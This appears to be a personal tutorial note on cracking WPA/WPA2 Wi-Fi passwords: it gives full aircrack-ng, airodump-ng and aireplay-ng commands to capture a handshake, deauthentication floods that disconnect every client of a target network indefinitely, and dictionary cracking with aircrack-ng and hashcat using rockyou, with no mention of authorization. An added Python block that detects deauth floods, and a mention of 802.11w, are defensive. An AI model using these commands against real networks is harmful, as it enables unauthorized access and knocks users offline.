hacking_wifi_aircrack



- **fileName**: hacking_wifi_aircrack
- **Created on**: 2025-07-19 12:29:23

Hacking Wi-Fi with aircrack-ng, airmon-ng and airodump-ng by capturing the handshake.

First you need to capture the handshake from the network (the handshake is the
exchange the network performs with a client to check that the client's password
is correct when it connects; it is saved to a capture file). After that, try to
guess the password using aircrack-ng with the rockyou wordlist.

Enter monitor mode:

```bash
sudo airmon-ng start wlan0   # <interface>
```

List the nearby networks and get information about them:

```bash
sudo airodump-ng wlan0mon
```

Now capture only the packets sent to the target network:

```bash
# --bssid <network bssid>, -c <channel>, -w <output file name>, then <interface>
sudo airodump-ng --bssid CC:29:BD:02:36:AC -c 7 \
    -w test1 wlan0mon
```

Now send deauthentication packets to the network's clients to drop their
connection to the network and make them retry connecting to it:

```bash
sudo aireplay-ng -0 500 -a CC:29:BD:02:36:AC -c F6:43:72:51:4F:ED wlan0mon
```
Important

-0 500 : the number of deauthentication packets to send
-a : the network BSSID
-c : the client that is connected to the network
wlan0mon : the name of the interface

There is a better way to do this:

```bash
sudo aireplay-ng --deauth 0 -a D4:6B:A6:82:09:7C wlan0mon   # -a <target_network>, then <interface>
```
Important

--deauth 0 : with no -c given, the target is every client connected to the
network, and the count of 0 means it does not stop on its own; you must stop it
once the handshake has been captured from the network.
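
Seen from the defender's side, the deauthentication bursts described above stand out to a wireless monitor as many deauth frames for one BSSID within a few seconds. The following is an added example, not part of the original notes: the record format, thresholds and function names are assumptions, and the sample frames are constructed.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_deauth_floods(frames, window=10.0, threshold=30):
    """Flag BSSIDs that see >= threshold deauth frames within `window` seconds.

    frames: iterable of (time_s, subtype, bssid, destination), sorted by time.
    Returns one alert dict per BSSID, raised the first time the threshold is hit.
    """
    recent = defaultdict(deque)   # bssid -> (time, destination) of recent deauths
    alerts = {}
    for ts, subtype, bssid, dest in frames:
        if subtype != "deauth":
            continue
        bssid, dest = bssid.lower(), dest.lower()
        q = recent[bssid]
        q.append((ts, dest))
        while ts - q[0][0] > window:      # drop frames older than the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerts:
            dests = {d for _, d in q}
            alerts[bssid] = {
                "bssid": bssid,
                "first_alert": ts,
                "count": len(q),
                "broadcast": BROADCAST in dests,          # all clients targeted
                "clients": sorted(dests - {BROADCAST}),   # specific clients targeted
            }
    return list(alerts.values())

def sample_frames():
    # Constructed data, not a real capture.
    ap_quiet, ap_hit = "02:00:00:00:00:01", "02:00:00:00:00:02"
    client = "02:00:00:00:00:aa"
    frames = [
        (0.0, "beacon", ap_quiet, BROADCAST),
        (5.0, "deauth", ap_quiet, client),     # a client leaving normally
        (300.0, "deauth", ap_quiet, client),
    ]
    # Burst of 64 deauth frames in about 1.3 seconds against one client
    frames += [(100.0 + i * 0.02, "deauth", ap_hit, client) for i in range(64)]
    return sorted(frames)

if __name__ == "__main__":
    for alert in detect_deauth_floods(sample_frames()):
        print(alert)
```

Where the access point and clients support it, enabling 802.11w (Protected Management Frames) lets clients reject forged deauthentication frames; a detector like this covers networks where that is not yet enabled.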

Now crack the password using aircrack-ng:

```bash
sudo aircrack-ng -a 2 -b D4:6B:A6:82:09:7C -w \
    ~/personal/hacking/genrate_numbers_password/passwords.txt ./test1-02.cap
```

Explanation

Important

sudo : Runs the command with root privileges (required for network actions).
aircrack-ng : The tool used to crack WEP/WPA/WPA2 Wi-Fi passwords using captured packets.
-a 2 : Tells aircrack-ng to target WPA/WPA2 networks. 2 = WPA/WPA2, 1 = WEP.
-b D4:6B:A6:82:09:7C : BSSID (MAC address) of the target access point.
-w ~/.../passwords.txt : Path to the wordlist file containing potential passwords.
./test1-02.cap : The capture file containing the WPA/WPA2 handshake.

What It Does

This command attempts to crack the WPA/WPA2 password of the access point with
BSSID D4:6B:A6:82:09:7C using a dictionary attack from the provided
wordlist, analyzing the handshake in test1-02.cap.

Tip

Make sure the .cap file includes a full handshake, or the attack will fail.

Tip

You must have a wordlist for cracking. Check these:
- rockyou.txt: search for it
- GitHub password lists

Tip

When using aircrack-ng for Wi-Fi cracking, it is better for performance to use
hashcat instead. First capture the handshake using airodump-ng and
aireplay-ng, then convert the .cap file to a hashcat file using
hcxpcapngtool, and then crack it using hashcat (for better speed).
To install the tools and run the commands:

```bash
sudo pacman -S aircrack-ng hcxtools hashcat  # install packages

# convert the capture to the hashcat hash format: -o <output file>, then <cap file>
hcxpcapngtool -o hash.hc22000 capture-01.cap

# start cracking, using the rockyou wordlist for example
hashcat -m 22000 -a 0 hash.hc22000 ~/rockyou.txt
```
